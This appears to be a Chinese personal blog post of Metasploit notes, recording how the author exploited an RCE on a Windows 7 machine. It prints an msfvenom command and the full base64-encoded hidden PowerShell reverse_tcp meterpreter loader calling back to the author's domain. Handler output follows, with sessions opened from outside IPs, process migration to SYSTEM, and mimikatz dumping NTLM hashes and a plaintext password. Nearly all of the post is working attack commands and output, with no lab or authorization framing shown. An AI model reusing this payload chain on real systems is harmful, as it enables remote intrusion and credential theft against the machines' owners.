Metasploit笔记2
遇到个RCE,想上神器MSF,systeminfo看了下是win7,想到用powershell,很方便。
用msfvenom生成ps1后,感觉这格式不太对啊。。看了下帮助,用psh-cmd就可以了。真的方便,记个笔记。
msf > msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=443 LHOST=lu4n.com -f psh-cmd
[*] exec: msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=443 LHOST=lu4n.com -f psh-cmd
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of psh-cmd file: 6739 bytes
%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAkAGUAbgB2ADoAdwBpAG4AZABpAHIAKwAnAFwAcwB5AHMAbgBhAHQAaQB2AGUAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQBlAGwAcwBlAHsAJABiAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAJwB9ADsAJABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBTAHQAYQByAHQASQBuAGYAbwA7ACQAcwAuAEYAaQBsAGUATgBhAG0AZQA9ACQAYgA7ACQAcwAuAEEAcgBnAHUAbQBlAG4AdABzAD0AJwAtAG4AbwBwACAALQB3ACAAaABpAGQAZABlAG4AIAAtAGMAIAAkAHMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAsAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBIADgAcwBUAGwAawBDAEEANwBWAFcAYgBXAC8AYQBTAEIARAArAG4ARQByADkARAAxAGEARgBoAEYARQBJAE4AaQBsAE4AUwBLAFIASwB0AHoAWQBHAFQASABHAEMAWQB6AEIAdgBSAFoAVgBqAHIAKwAwAE4AYQA1AHYAWQA2ADQARABUADYAMwArAC8ATQBlAEMARQBYAE4ASwA3AFgAcQBXAHoAawBOAGkAWABlAFgAbgAyAG0AWgBtAGQAZABkAFAAUQBaAGkAUQBLAE8AVwBmADkANQBXAGEATQBtAHQAegAzADkAKwArAE8AQgBsAFoAcwBCAFIAeABmAGkAcgBTAFcAUABQAEsAYgA2AG4AcABvAFYAYgBtAFMATwB6AHUANwBFAEEAbABDADkAMQAyAHIAYwBuAFEARQBZAHEAVwA3AEsAOABaADkANQB2AGcANQBXAHEAMQBhAFUAVwBDAFIAYwBIAEYANQBLAGEAZAB4AGoARQBPADIAbQA5AGMANgBtAEsARQBrAHcAYwBFAHQASgBUAGoAaABLADkAeQBmADMATgBqAEgATQBUADYANQB2AHIAMwBEAE4AdQBPACsAYwA2AFYAdgB0AFEANgBOAGIAaQAyADYARgA4AHQAawB5AC8AWQB4AGQANABKAEMASgA5AC8AcgBSADcAYQBWAHcANgBzAFoASwAwAG8AWQBYAC8ANwA2AHQAVgB5AFoAbgA5AFEAWABOAGUAVQArAHQAVwBqAEMAbAA0ADAAcwBZAFQAaQBvAE8AWgBTAFcASwA5AHkAUABTAHUANQB3AG0ASwAwAHcAWAA5AGEASQBIAFUAZABKADUATABMAGEAbQBJAFEAZgBUADIAdQBqAE0ATABGAGMAZgBBAFgAVwBIAHIAQwBHAG0AUgA4ADUAUwBiAGsAQwBoADQAQgBmAGoARgBrAGEAaAAxAHgAKwBuAEYAeAAvAHQAOAB1AFgAWQBUAGkASQBJAHgAcwA1AFQAbwB3AFQARQBLADYAcAA0AFUATwAwAHgASAB3AHAAVABDAG0AdABjAG4ALwB3ADgANwAzAHoAbQB6AFIAawBKAE0AQwB3AHoAMwBBAGMAcgBRAHcAYwBQAHgAQQBiAEoANwBXAHUARgBUAG8AVQAzADIAQgAzAHcAVgAvAGgAZABYAEgAbQBYADEAWABpAEQANQBWAEEAYQBzAEQAaQBTAGgAVwBDADgAaABxAGwARgBqAGsAcAB4AFQAdgBGAGMAdQBVADEAegBzAE0ANABWAHUARAA3AFcAeQB5AEIAaABSAC8AdgAzADcAMQAvADUAeABhAHAAdwBCAHoANgA1AFQAQQBQAFkASABRADAAMwA0ADQAeABZAE8AVQBIAFUAVQBLADIAYwBwADgANQBzAGMAcABwADQATgBaAGkAVQBaAHoAQgB0AEQAUwBNAFUAMQB4AFoAYwBQAE0AOABCAFAAUABGAGcAaQB2AEYANQAvAFQANgBxAHYAcAB6AEEALwBWAEMARwBtAFQAdgBPAGgAZQBiACsAOQBIADUAagBhAFIATwB2AHMASABXADMASQB5AEkAcwB3AEQAVgBmAFoAUgBLADkAaABnAEYAVABxAGoARgBiAHIANwA1ADgANQBSAHIAWQBaAGUARQB1AEoAVwBGAFYAawBEAHMASQBxAHYANAB0AHkASwBBAFgAWQBxADMASgA2ADQAVgBZAGwAZQBBAGsAQwAvAHYATgA3AEQAVAB3AGgAUgA3AEYAcwB0AEoAcgBYAEwAegAxADIAcABLAFEATgBpAFQAcgBwAFEAUwA2AHUAQQBZADIAUgBEAEYAQgBGAEIAQgBnAEMAcwB2AHcAZQB6AGkAeABKAGYAVgBVAE0ATQBCAE0ATABhAGIAbAAvAE4AdwBRAEMANwBqAFEAbgBxAGYAdgAxAG4AaABQAFoAKwBEAFUARgBtAG0AVgBwAEoAVQB1AFUARQBLAHgAVwBSAFgATwBRAE4AYgBGAEQAdABWAEQAbwBVAEoAMgBXACsAaABsAEUAWABiAFkAZgBrAFoAcgBwAFoAUwBSAG0AdwByAFkAWQBXADUAUgBlAFUARgBtAFgAdQBuAGMAaABRAG0ATABFADUAdABpAEMAUQBRAE0ARABSAFcAMgBDAFkAVwB6AGYAbQBvAGMAbAAzAGkAWQBDAGsAegBpAEYAYwA0AEwANwAvAEoAaABtAHgAUgBTAGsASQBQAEwARAAxAEEATgBHAEEAbABaADgARgBnAGUAWAA3AEUAZwBIAE8AWABDADUAVwBhAGcAWgBrAGEAcgBDAGcATwBRAEcAaABiADIAMgAxAHEAZQBWAEQASgArADQATABZAFoAcABUAGwAWQBhAGYAOABKAHMANABpADcAWABjADUAbgB0AE4AUwA4AEgARwBBAEUAbQBKAHQAMABJAGgAVgBPAFoAUABFAEQATwA2AEoAbgBPAEwARAA3AFAAcABOAE0AQQBkAFgAeABUAE0AcwBPAGMAYgA3AEcAUABGAEYASQBjADIAbABqAE8AWABwAFgAOABMAFQAOQBxAGYAcgB2AEQAQQBLAHQAcgBiAGMAeABBAHgANABhAGMAZABSAEkARgBrAEoAUABtAHMAWQBMAEEAYgBXACsAQQArAEMAUQBsAHEAZgBCAHEAMwBvAEUAYwBHAG4AdABHADkAMABVAHoASgBHADUAawB6AFYAbgBCADQAMQBWAEcAWgBNAEYAZABJAGYAKwBiADUASwA2AHEAbwBIADgAMgB5AGsAZQBBAE0AbQByAHIANABNAGgAOQAyAGUAMABlAHEAaQB1AEwAWAB4AFgAYQBRAG0AcQB0AEsAVgBNAHIAMAB1AEkAYgB0AEwAegBzADIAZQBOAEIAcQBCAEgAcABIADcAKwB0ADEARwBSAFkANABVAGUAQgBOAHYASwBxAC8AVgBnAFQAOQBSAHcAWgBIAGMAOQAxAFEAUAAvAGkAWABWAHQAeQBWAHgASgBuAHEAUwAyAEoAYgA3AGgAdQBRAHIAUgBFAFMAZQBvAFgAZgAxAFIAbgAyAG0AQwBrADAAcQBrAFUAZABEAE4AVgBCADMALwBPAFQAdgB5AFkALwBTAGEASABRAG4AbQB5AEcANgAwAG4AcgBJAGIAMQA4ADcANwBmAHAAcABlADYAdQAvAHoAUABWAG4AeQAwADYALwBwAFcAegBuAGQAagA3AFgAcAA0AGwAQwBGAFAAQwBqAHQASwBlADYANgBlAE8AeAB1AFoATABHAFMAbgB1AG0AbQB5AHYAVgBPADEANQA3AHUAdABrAFgARwBtADEAZgBnAG4AVwBWAGIAUABvAHIAUQA0AEMAdgBYAHUAOAA5AGgATQA2AGoAUgBwAHUAUABHAHMARABWAHoAVgBtAFAANABKAG4AcQA0AGMAeABEAE8AawBMAEcATgBLAFQARwA3AFYAcABHAHEASABNACsAMgA2AFQAbgBkAGEAVQA5AGcAcgBYAGwAVQBBADAAMwArAHUAMQBLAGMANwBKAHAAVgA3AGcAdwBOAFkASgBYAEUAZABJAFYAaABOAG8AVQB5AGoAVgBBADEAcgBvAGwAMQBNAGQAUgBXAHoAYwAvADYAUwBOAEYAMwBHAFEAagBjAGIATgBXADcAbwBTADEAUQBuAHIAcgA1AGYANQAvADEARABrADcAOAB3AFMAMwBNAFIAQgBNAFEAdwAyADcAbABpADgAQgAzAHEAegBYAFcASgBMAGUATQBlAHcARgBsAGkAbABPAFgAYwBIAE0AKwBaAE8AWABvAGYAQQBZAFQAdQBoAFoAVAA5AHQAeQBDAHUAZgBSAFEAWQBmAGsAbgBGAG4AZQBEAGUAagB0AGQAQgBBAEwAMQBZAGsAZwBtAEoANwBnAEkAWgBlAGEAcQB0AGYAVQB2AFUAawBVAG4AbABwAEwAcwBEADMAMgBFAEMAQwBFAE0AMABLAHMAMwBaADYAcQAyAFkAQwBWAGsAdQBYAG8AZQBDAEwAVQBSADQAQgBIAEQASABvAGIATQBjAGMAYQA5AEoAcABnADcAMwBUADUAaABrADMARABCADIANgBkAG0AWQBXAGsASABJAGMAMAA3AGsAUgBvAHYATwB5AGMAeQBWAGwAegBvAE0ARQA1AHoARAByAFkARABNADEAMABPAE8ANgBDAFQAYwBDAGMATABwAHMANQB6AFIARABmAGwAaQBHAEgASABVAE8AZABuAEQAcQAzAE4ANQBKAHcANwBFAHcAdABUADUAbwBaAHQAaQBzADMAKwAyAE4AaQBQAGcAagBtAGgANwB3AFUAbwBCAFoASwAwAGYAMQBTAGMAVgAyAFYAWgBoAGQAYQBlAHAARABqAFAAMgB0AHMAbQBoAFUAbgB2AGsAVQBoADkANgBGAGwARgBaAGQAUgBPADQAcgBiACsANwBZAHoAaQBFAGkAdQB3AGYAUABGAFMAMgBTAEoANAB4AEIAVABhAE4AMwBRADMASQB0AEsAUgBwAFIARwBkAHQANABHAHQAegAwAEsAVwB2AEMAdQBNAFMANwBnAFEAaAByAEIAOABPAFAAcABtADYATQBLADkAeQBSAFkAZQBlADYAUAB4AGQATABsADUAUQB5AEEAdwBwADIAdwBLADkAZABhAEgANABjAGUAOAA2AHYAaQA1AHEATQBvAFEAbwBNAFQATgB3ADAAUgBqAHYAegByAHgANQBPAGoAVgBjAGIAdgBqAFYAWAB6AEYAdgBtAEMAcQBXAGMALwBkAE8AdQBuAGsAdAA4AFkAcABRAGgAeQBNAGUAdwBrADAAZgAvAE8ANAAvADYANgA4AHUASABQACsAVABjAGUAbgA5AGYAKwBZAGYAZQBYAHUAQgBXAHIATAB6AGwANAB0AGYAMQB5ADQAVAAvAFIALwBUAHMAcwBqAEMAMwBDAFEATgBpAEEAaQA1AGYAaQAzAGEAdgBnAGIAVABMADIAKwBYAFAAdwBxAEMAbwBpAEIAZgBuAGgANwByAC8AOABXAFgAdQBkAHMAcABNAHIAZQBHAC8AOQBCAFQAdQA4AE0AKwBaAFEAQwB3AEEAQQAnACcAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=msf > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST lu4n.com
LHOST => lu4n.com
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > run
[*] Started reverse TCP handler on 103.27.187.212:443
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (103.27.187.212:443 -> 1.1.1.1:27185) at 2017-06-24 17:12:16 +0800
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.107 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) > run
[*] Started reverse TCP handler on 103.27.187.212:443
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (103.27.187.212:443 -> 2.2.2.2:63796) at 2017-06-24 17:13:12 +0800
meterpreter > sysinfo
Computer : JDE920-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 4
Meterpreter : x64/windows
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
256 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
272 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
332 320 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
380 372 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
388 320 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
416 372 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
476 388 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
484 388 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
488 476 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
492 388 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
588 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
652 476 VBoxService.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\VBoxService.exe
664 1768 cmd.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\cmd.exe
716 476 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
808 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
840 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
868 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe
1132 476 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1184 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1260 476 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1308 476 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe
1348 476 FoxitConnectedPDFService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe
1428 380 conhost.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\conhost.exe
1460 1768 VBoxTray.exe x64 1 JDE920-PC\JDE920 C:\Windows\System32\VBoxTray.exe
1464 1576 opmn.exe x64 1 JDE920-PC\JDE920 C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\opmn\bin\opmn.exe
1572 1768 cmd.exe x64 1 JDE920-PC\JDE920 C:\Windows\System32\cmd.exe
1576 2024 opmn.exe x64 1 JDE920-PC\JDE920 C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\opmn\bin\opmn.exe
1580 476 TNSLSNR.EXE x64 0 JDE920-PC\920JDE C:\Oracle\E1Local\BIN\TNSLSNR.exe
1656 380 conhost.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\conhost.exe
1716 840 dwm.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\Dwm.exe
1732 476 taskhost.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\taskhost.exe
1768 1704 explorer.exe x64 1 JDE920-PC\JDE920 C:\Windows\Explorer.EXE
1876 476 oracle.exe x64 0 JDE920-PC\920JDE c:\oracle\e1local\bin\ORACLE.EXE
1940 476 oravssw.exe x64 0 JDE920-PC\920JDE c:\oracle\e1local\bin\OraVSSW.exe
2160 476 wmpnetwk.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Program Files\Windows Media Player\wmpnetwk.exe
2176 1572 java.exe x64 1 JDE920-PC\JDE920 C:\Oracle\MIDDLE~1\OVR_HOME\ORACLE~2\jdk\bin\java.exe
2676 476 ducservice.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\No-IP\ducservice.exe
2792 476 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\SearchIndexer.exe
3012 476 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe
3136 1464 sawserver.exe x64 1 JDE920-PC\JDE920 C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\web\bin\sawserver.exe
3144 1464 java.exe x64 1 JDE920-PC\JDE920 C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\jdk\bin\java.exe
3152 1464 nqsserver.exe x64 1 JDE920-PC\JDE920 C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\server\bin\nqsserver.exe
3164 1464 nqscheduler.exe x64 1 JDE920-PC\JDE920 C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\server\bin\nqscheduler.exe
3180 1464 nqsclustercontroller.exe x64 1 JDE920-PC\JDE920 C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\server\bin\nqsclustercontroller.exe
3824 6196 java.exe x86 1 JDE920-PC\JDE920 C:\PROGRA~2\Java\JDK17~1.0_8\bin\java.exe
4288 4492 LaunchJVM.exe x86 1 JDE920-PC\JDE920 C:\JDEdwards\E920\system\bin32\LaunchJVM.exe
4348 5764 fenix.exe x86 1 JDE920-PC\JDE920 C:\ProgramData\Fenix\fenix.exe
4492 1768 activConsole.exe x86 1 JDE920-PC\JDE920 C:\JDEdwards\E920\system\bin32\activConsole.exe
4668 4492 iexplore.exe x86 1 JDE920-PC\JDE920 C:\Program Files (x86)\Internet Explorer\iexplore.exe
5104 4668 iexplore.exe x86 1 JDE920-PC\JDE920 C:\Program Files (x86)\Internet Explorer\iexplore.exe
5348 380 conhost.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\conhost.exe
5436 2176 powershell.exe x64 1 JDE920-PC\JDE920 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
5736 4572 iexplore.exe x86 1 JDE920-PC\JDE920 C:\Program Files (x86)\Internet Explorer\iexplore.exe
5764 1768 fenix.exe x86 1 JDE920-PC\JDE920 C:\ProgramData\Fenix\fenix.exe
6160 380 conhost.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\conhost.exe
6196 6204 cmd.exe x86 1 JDE920-PC\JDE920 C:\Windows\SysWOW64\cmd.exe
6220 3824 cmd.exe x86 1 JDE920-PC\JDE920 C:\Windows\SysWOW64\cmd.exe
6528 4492 jdenet_n.exe x86 1 JDE920-PC\JDE920 C:\JDEdwards\E920\system\bin32\jdenet_n.exe
7036 5436 powershell.exe x64 1 JDE920-PC\JDE920 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
7060 6220 java.exe x86 1 JDE920-PC\JDE920 C:\PROGRA~2\Java\JDK17~1.0_8\bin\java.exe
7140 380 conhost.exe x64 1 JDE920-PC\JDE920 C:\Windows\system32\conhost.exe
meterpreter > migrate 2792
[*] Migrating from 7036 to 2792...
[*] Migration completed successfully.
meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;102261 NTLM JDE920-PC 920JDE lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;98726 NTLM JDE920-PC 920JDE lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;92043 NTLM JDE920-PC JDE920 lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;86291 NTLM JDE920-PC 920JDE lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)
0;996 Negotiate WORKGROUP JDE920-PC$ n.s. (Credentials KO)
0;24337 NTLM n.s. (Credentials KO)
0;999 NTLM WORKGROUP JDE920-PC$ n.s. (Credentials KO)
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate WORKGROUP JDE920-PC$
0;24337 NTLM
0;999 NTLM WORKGROUP JDE920-PC$
0;102261 NTLM JDE920-PC 920JDE 123456
0;98726 NTLM JDE920-PC 920JDE 123456
0;92043 NTLM JDE920-PC JDE920 123456
0;86291 NTLM JDE920-PC 920JDE 123456
meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) >
wenyu
2017年8月2日 上午10:31
想打赏来着。。。没连接啊,哈哈哈哈
lsh4ck
2017年7月26日 上午11:56
你的好了
我的
lsh4ck’s blog
www.lshack.cn
Luan
2017年7月27日 下午12:32
没看到啊